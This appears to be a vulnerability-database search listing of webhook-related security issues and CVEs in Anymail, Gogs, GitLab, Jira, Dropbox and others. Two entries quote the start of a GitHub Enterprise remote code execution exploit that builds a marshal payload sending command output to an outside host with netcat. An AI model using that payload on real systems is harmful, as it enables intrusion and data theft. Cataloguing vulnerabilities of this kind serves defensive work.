698 matches found
Information Disclosure
django-anymail is vulnerable to information disclosure. When an error occurs, the value of the WEBHOOKAUTHORIZATION setting is printed in the Django error reports. This may allow anyone with access to the logs to discover the webhook shared secret and send inbound/tracking events to your...
Anymail Timing Attack Vulnerability
Anymail aka django-anymail is an open source e-mail sending and receiving system . A security vulnerability exists in the webhooks/base.py file in versions of Anymail prior to 1.2.1. No details of the vulnerability are provided at this time...
Code injection
webhooks/base.py in Anymail aka django-anymail before 1.2.1 is prone to a timing attack vulnerability on the WEBHOOKAUTHORIZATION secret, which allows remote attackers to post arbitrary e-mail tracking events...
CVE-2018-6596
webhooks/base.py in Anymail aka django-anymail before 1.2.1 is prone to a timing attack vulnerability on the WEBHOOKAUTHORIZATION secret, which allows remote attackers to post arbitrary e-mail tracking events...
CVE-2018-6596
webhooks/base.py in Anymail aka django-anymail before 1.2.1 is prone to a timing attack vulnerability on the WEBHOOKAUTHORIZATION secret, which allows remote attackers to post arbitrary e-mail tracking events...
CVE-2018-6596
CVE-2018-6596 affects Anymail (django-anymail) webhooks/base.py, where a timing attack on the WEBHOOK_AUTHORIZATION secret can let remote attackers post arbitrary email tracking events. Affected versions are before 1.2.1. Remediation as per sources: upgrade to Django-Anymail 1.2.1 or later; Debia...
Information Disclosure
github.com/gogits/gogs is vulnerable to arbitrary webhook retrieval. GetWebhookByID allows a user to access webhooks from other users' private repositories because it does not check the corresponding repoid when retreiving webhooks...
Shopify: API Webhooks Fire And Are Unlisted After Permissions Removed
Hi All, quick note, I debated reporting this given recent developments and conversations. However, it seemed odd to wait until June to discuss the potential here, especially after I mulled over the design decision for two weeks having tested this April 25. That said, if you agree with the...
GitHub Enterprise 2.8.7 - Remote Code Execution
GitHub Enterprise 2.8.7 - Remote Code Execution !/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "id | nc orange.tw 12345" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07...
GitHub Enterprise < 2.8.7 - Remote Code Execution
!/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "id | nc orange.tw 12345" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07" + ":\x09@src" + Marshal.dumpcode2..-1 +...
GitLab: Attacker can delete (and read) private project webhooks
Vulnerability details An attacker can delete and read webhooks that are configured for all projects on a GitLab instance. This includes private projects. This is a bad vulnerability because these webhooks contain private API tokens most of the time. Proof of concept As a victim, create a project...
JQL filter for Webhooks doesn't work correctly when "Comment" and "Worklog" related events are fired - CVE-2017-18104
panel:bgColor=e7f4fa NOTE: This bug report is for JIRA Server. Using JIRA Cloud? See the corresponding bug report|http://jira.atlassian.com/browse/JRACLOUD-59980. panel h3. Security information The Webhooks component of Atlassian Jira before version 7.6.7 and from version 7.7.0 before version...
JQL filter for Webhooks doesn't work correctly when "Comment" and "Worklog" related events are fired - CVE-2017-18104
panel:bgColor=e7f4fa NOTE: This bug report is for JIRA Server. Using JIRA Cloud? See the corresponding bug report|http://jira.atlassian.com/browse/JRACLOUD-59980. panel h3. Security information The Webhooks component of Atlassian Jira before version 7.6.7 and from version 7.7.0 before version...
amoCRM - Moderately Critical - Cross Site Scripting - SA-CONTRIB-2015-149
This module enables you to integrate with amoCRM service using webhooks. The module does not sufficiently sanitize the logged data when malicious POST data is received. This vulnerability is mitigated by the fact that a module such "Database logging" dblog must be enabled which displays log...
Dropbox: SSRF vulnerablity in app webhooks
Server Side Request Forgery SSRF is a vulnerabilty which allows an attacker to make web requests from the context of the server host machine to arbitrary URL's. This vulnerability can allow the attacker to access resources internal to the network, which would otherwise be inaccessible. This...
Not being able to create webhooks with basic authentication.
panel:bgColor=e7f4fa NOTE: This suggestion is for JIRA Cloud. Using JIRA Server? See the corresponding suggestion|http://jira.atlassian.com/browse/JRASERVER-31953. panel Using the procedures to use basic auth described on...
Not being able to create webhooks with basic authentication.
Using the procedures to use basic auth described on https://extranet.atlassian.com/display/SUPPORT/Webhooks+readiness+for+JIRA+5.2 we are getting a "Invalid URL" message. !https://jira.atlassian.com/secure/attachment/85015/webhookserror.png! workaround For Atlassian applications, the REST plugin ...
Not being able to create webhooks with basic authentication.
panel:bgColor=e7f4fa NOTE: This suggestion is for JIRA Server. Using JIRA Cloud? See the corresponding suggestion|http://jira.atlassian.com/browse/JRACLOUD-31953. panel Using the procedures to use basic auth described on https://extranet.atlassian.com/display/SUPPORT/Webhooks+readiness+for+JIRA+5...